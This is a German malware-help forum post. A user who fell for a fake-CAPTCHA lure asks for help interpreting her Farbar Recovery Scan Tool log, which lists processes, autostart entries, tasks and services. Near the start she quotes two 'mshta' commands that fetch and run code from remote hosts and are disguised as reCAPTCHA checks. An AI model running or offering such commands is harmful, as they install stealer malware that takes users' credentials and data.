| |
| |||||||
Log-Analyse und Auswertung: Windows 11: Vermeintliche Infektion mit Lumma?-Stealer nach Fake-CaptchaWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
Gestern, 14:37
| #1 |
| |  Windows 11: Vermeintliche Infektion mit Lumma?-Stealer nach Fake-Captcha Hallo Trojaner-Board-Community, mir ist ein Fehler unterlaufen und ich suche nun euere Hilfe beim Auswerten der FRST Logs. Beim Besuch der Webseite von invoiz.de bin ich auf ein Fake-Captcha reingefallen. Normalerweise kommt kein Captcha. Diesmal jedoch kam die (für andere Webseiten) gewöhnliche "Ich bin kein Roboter"-Checkbox. Nach kurzer Ladezeit kam eine Aufforderung das Ausführen Fenster (Win+R) zu öffnen und folgenden Befehl auszuführen: Code:
ATTFilter mshta https://solve.vwglq.com/awjxs.captcha?u=790e6686-a761-4684-a3f9-feab893b31f6 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 4285''
Code:
ATTFilter mshta https://check.qlkwr.com/awjsx.captcha?u=56020c71-bea1-4468-9e4a-7400c2c12f95 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8306''
 Ich hab ziemlich zeitnah die Netzwerkverbindungen getrennt und den Rechner ausgeschaltet. Bei den Recherchen hab ich erfahren, dass es sich wohl um eine Art Stealer bzw. den Lumma-Stelaer handeln müsste. Ich habe dazu folgenden Artikel gefunden: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha Die Anzeichen auf dem Dateisystem, so wie sie im Artikel beschrieben werden, konnte ich aber nicht finden. Hier sind die Logs: FRST.txt Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-01-2025
durchgeführt von Lisa (Administrator) auf E595 (LENOVO 20NF0000GE) (06-01-2025 12:18:51)
Gestartet von C:\Users\Lisa\Downloads\FRST64_0125.exe
Geladene Profile: Lisa
Plattform: Microsoft Windows 11 Pro Version 23H2 22631.4602 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Chrome
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems LLC.) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\SA3\SmartAudio3.exe
(5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems, Inc) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\Flow\Flow1\Flow.exe
(5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems, Inc.) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\AFA\CAudioFilterAgent64.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe <2>
(C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.30502.30.0_x64__cw5n1h2txyewy\WidgetBoard.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.112\msedgewebview2.exe <8>
(C:\Program Files\Wireshark\Wireshark.exe ->) (Wireshark Foundation -> The Wireshark developer community) C:\Program Files\Wireshark\dumpcap.exe
(DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atiesrxx.exe ->) (Advanced Micro Devices Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atieclxx.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <18>
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(explorer.exe ->) (Wireshark Foundation -> The Wireshark developer community, hxxps://www.wireshark.org/) C:\Program Files\Wireshark\Wireshark.exe
(Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2410.21.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe <4>
(Notepad++ -> Don HO don.h@free.fr) C:\Program Files\Notepad++\notepad++.exe
(services.exe ->) () [Datei ist nicht signiert] C:\Program Files (x86)\DSDCS\InputMapper 1.7\HidGuardian\InputMapperCerberusWhitelister.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe
(services.exe ->) (Advanced Micro Devices Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atiesrxx.exe
(services.exe ->) (Citrix Systems, Inc. -> Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\UpdaterService.exe
(services.exe ->) (Conexant Systems LLC -> Conexant Systems, Inc.) C:\Windows\CxSvc\CxUtilSvc.exe
(services.exe ->) (Debauchee Open Source Group) [Datei ist nicht signiert] C:\Program Files\Barrier\barrierd.exe
(services.exe ->) (Dolby Laboratories, Inc. -> ) C:\Windows\System32\dolbyaposvc\DAX3API.exe <2>
(services.exe ->) (Lenovo -> Lenovo) C:\Windows\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmsvc.exe
(services.exe ->) (Lenovo -> Lenovo.) C:\Windows\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\LITSSvc.exe
(services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WSL\wslservice.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(services.exe ->) (Synaptics Incorporated -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(services.exe ->) (Synaptics Incorporated -> Conexant Systems LLC.) C:\Windows\CxSvc\CxAudioSvc.exe
(services.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnhService.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) C:\Program Files\Common Files\Zoom\Support\CptService.exe
(sihost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.StartExperiencesApp_1.1.200.0_x64__8wekyb3d8bbwe\MicrosoftStartFeedProvider\MicrosoftStartFeedProvider.exe
(svchost.exe ->) (Lenovo -> Lenovo) C:\Windows\SysWOW64\Lenovo\PowerMgr\PowerMgr.exe
(svchost.exe ->) (Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\OpenConsole.exe
(svchost.exe ->) (Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.30502.30.0_x64__cw5n1h2txyewy\WidgetBoard.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPHelper.exe
(SynTPEnhService.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnh.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [4116904 2024-10-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [SteelSeriesGG] => C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe [12891520 2022-12-07] (SteelSeries ApS -> SteelSeries ApS)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [RTKUGUI] => "C:\WINDOWS\system32\RtkUGui64.exe" -s (Keine Datei)
HKLM-x32\...\Run: [Qsync] => C:\Program Files (x86)\QNAP\Qsync\Qsync.exe [94901072 2023-08-30] (QNAP Systems, Inc. -> QNAP Systems, Inc.)
HKLM-x32\...\Run: [InstallHelper] => C:\Program Files (x86)\Citrix\Citrix Workspace 2409\InstallHelper.exe [683296 2024-12-09] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM-x32\...\Run: [AnalyticsSrv] => C:\Program Files (x86)\Citrix\ICA Client\Receiver\AnalyticsSrv.exe [2901856 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [3108456 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [1067624 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Beschränkung <==== ACHTUNG
HKLM\SYSTEM\...\Terminal Server: [fDenyTSConnections] = 0 <==== ACHTUNG
HKU\S-1-5-19\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.)
HKU\S-1-5-20\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4375912 2023-09-29] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37180368 2023-12-28] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [MicrosoftEdgeAutoLaunch_EAC21D00D4BC08C838A9AA4DBEEC9392] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3911240 2024-12-19] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe [22365592 2024-10-29] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Docker Desktop] => C:\Program Files\Docker\Docker\Docker Desktop.exe [281392 2023-04-12] (Docker Inc -> Docker Inc.)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [EADM] => C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe [2668648 2023-06-13] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Discord] => C:\Users\Marcel\AppData\Local\Discord\Update.exe [1525024 2023-09-18] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Marcel\AppData\Local\Microsoft\Teams\Update.exe [2591920 2024-03-02] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [GoogleChromeAutoLaunch_11F810DC58703105CF0600BCC1ED96D2] => "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 [3012192 2024-12-17] (Google LLC -> Google LLC)
HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.)
HKU\S-1-5-18\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.)
HKLM\...\Print\Monitors\pdfcmon: C:\WINDOWS\system32\pdfcmon.dll [181248 2022-05-19] (pdfforge GmbH) [Datei ist nicht signiert]
HKLM\Software\...\AppCompatFlags\Custom\AuthManSvr.exe: [{e06cf029-144b-4f2a-9621-b4f659aa6952}.sdb] -> Citrix Workspace
HKLM\Software\...\AppCompatFlags\InstalledSDB\{e06cf029-144b-4f2a-9621-b4f659aa6952}: [DatabasePath] -> C:\WINDOWS\AppPatch\CustomSDB\{e06cf029-144b-4f2a-9621-b4f659aa6952}.sdb [2024-12-06]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\131.0.6778.205\Installer\chrmstp.exe [2024-12-27] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{60f15951-e7ef-11ea-b28e-c4b301b9ed33}] -> C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\130.1.1.12\Installer\chrmstp.exe [2024-10-23] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
IFEO\CompatTelRunner.exe: [Debugger] %windir%\System32\taskkill.exe
IFEO\software_reporter_tool.exe: [Debugger] %windir%\System32\taskkill.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2022-08-11]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {F9DBE791-D220-4CAF-8F59-1385725B4DA4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1574856 2024-09-25] (Adobe Inc. -> Adobe Inc.)
Task: {72FC45C7-F0A9-4BDB-BDCF-B096B6446D53} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [4116904 2024-10-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {05FFDA11-9DC4-499C-81DA-8C607FDA1BDB} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [4455336 2024-10-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {0D9AFC2E-5E0A-436E-B0BC-9DCD6B7D368F} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe [5575576 2024-12-10] (Microsoft Windows -> Microsoft Corporation)
Task: {9D35EB52-8B63-4A90-BE13-4836E5C61D01} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{42FE6726-4BBB-46EB-AFD6-EF31194095DA} => C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe [5591136 2024-11-11] (Google LLC -> Google LLC)
Task: {53670166-5227-4913-8A6C-5E573788B5E6} - System32\Tasks\Lenovo\Power Manager\Background monitor => C:\WINDOWS\SysWOW64\Lenovo\PowerMgr\PowerMgr.exe [129368 2024-06-26] (Lenovo -> Lenovo)
Task: {1A413F9F-6CE5-4A52-B9E5-50AFDE2B7232} - System32\Tasks\Lenovo\Power Manager\Uninstall task => C:\WINDOWS\SysWOW64\PowerMgrInst.exe [67424 2024-06-26] (Lenovo -> )
Task: {4C51E860-22D5-4DB3-87A3-1DF4834AD328} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23570544 2024-11-27] (Microsoft Corporation -> Microsoft Corporation)
Task: {44929D8A-ACF1-43C8-B9CF-8FE1B8A361E0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23570544 2024-11-27] (Microsoft Corporation -> Microsoft Corporation)
Task: {20E99461-6A3B-49E0-90D9-D481F7D711A8} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2209888 2024-12-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {357DFAC2-A53D-4B82-8E92-DF058D80106D} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2209888 2024-12-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {7E747EBD-CD0A-4FB5-8002-94C0EF4EBD12} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [3514936 2024-12-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {354006FC-B9E8-46EA-A9C6-5C83F5BC0C32} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [3514936 2024-12-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
Task: {C970DF4C-F292-4407-B5E9-978DFD15E681} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F90C6CEE-A6CF-416E-BAB2-560FFA3EB1EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4C57A0B7-30DE-4B3A-B627-7ED951065754} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2820F1F9-8402-4C3E-B45D-B483F485017C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4C5C5E12-ED79-4B0D-8459-3C07FA416D70} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [815 2022-11-22] () [Datei ist nicht signiert]
Task: {9629FA7F-0076-4628-85C0-A1888D18294B} - System32\Tasks\ViGEmBusUpdater => C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBusUpdater.exe [901144 2019-05-10] (Nefarius Software Solutions e.U. -> Nefarius Software Solutions e.U.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: 127.0.0.1 kubernetes.docker.internal
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1b5a7009-2370-4b1f-93e2-0dbe50e952a6}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1b5a7009-2370-4b1f-93e2-0dbe50e952a6}: [DhcpDomain] gn1.roell-online.de
Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}: [DhcpDomain] gn1.roell-online.de
Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}\3516E6471637353686C696474756E675C616E6: [DhcpNameServer] 192.168.65.37
Tcpip\..\Interfaces\{f6efe30a-0696-4958-abc2-6b82cf54b596}: [DhcpNameServer] 10.42.0.1
Edge:
=======
Edge Profile: C:\Users\Lisa\AppData\Local\Microsoft\Edge\User Data\Default [2022-02-28]
FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2022-11-08] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2024-12-05] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR Profile: C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default [2025-01-06]
CHR HomePage: Default -> hxxps://www.google.de/
CHR Extension: (Google Docs Offline) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-12-27]
CHR Extension: (Anwendungs-Launcher für Drive (von Google)) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-08-25]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-02-28]
CHR HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [172992 2024-09-25] (Adobe Inc. -> Adobe Inc.)
S2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3910472 2024-02-09] (AnyDesk Software GmbH -> AnyDesk Software GmbH)
S3 appprotectionsvc; C:\Program Files (x86)\Citrix\ICA Client\appprotection.exe [729664 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
R2 Barrier; C:\Program Files\Barrier\barrierd.exe [450048 2021-11-01] (Debauchee Open Source Group) [Datei ist nicht signiert]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9498224 2024-11-27] (Microsoft Corporation -> Microsoft Corporation)
S3 com.docker.service; C:\Program Files\Docker\Docker\com.docker.service [19792 2023-04-12] (Docker Inc -> Docker Inc.)
S3 CtxAdpPolicy; C:\Program Files (x86)\Citrix\AppDataProtection\CtxAdpPolicy.exe [330608 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S3 CtxPkm; C:\Program Files (x86)\Citrix\AppDataProtection\CtxPkm.exe [1303392 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
R2 CWAUpdaterService; C:\Program Files (x86)\Citrix\ICA Client\Receiver\UpdaterService.exe [1708320 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
R2 CxAudioSvc; C:\WINDOWS\CxSvc\CxAudioSvc.exe [94496 2022-03-29] (Synaptics Incorporated -> Conexant Systems LLC.)
R2 CxAudMsg; C:\WINDOWS\System32\CxAudMsg64.exe [244512 2022-03-29] (Synaptics Incorporated -> Conexant Systems Inc.)
S2 CxUIUSvc; C:\WINDOWS\System32\CxUIUSvc64.exe [123144 2022-03-29] (Synaptics Incorporated -> Conexant Systems, Inc.)
R2 DolbyDAXAPI; C:\WINDOWS\system32\dolbyaposvc\DAX3API.exe [1926600 2019-09-02] (Dolby Laboratories, Inc. -> )
S3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11459176 2023-06-13] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1136552 2023-05-12] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2023-05-12] (Epic Games Inc. -> Epic Games, Inc.)
R2 IBMPMSVC; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmsvc.exe [1031024 2023-06-20] (Lenovo -> Lenovo)
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper 1.7\HidGuardian\InputMapperCerberusWhitelister.exe [15360 2020-01-10] () [Datei ist nicht signiert]
S4 LenovoBrightCtrl; C:\WINDOWS\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\BrightnessControl.exe [160080 2024-07-29] (Lenovo -> Lenovo.)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11712920 2024-10-29] (Logitech Inc -> Logitech, Inc.)
R2 LITSSVC; C:\WINDOWS\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\LITSSvc.exe [1099592 2024-07-29] (Lenovo -> Lenovo.)
R2 logi_lamparray_service; C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe [11177064 2024-10-30] (Logitech Inc -> Logitech, Inc.)
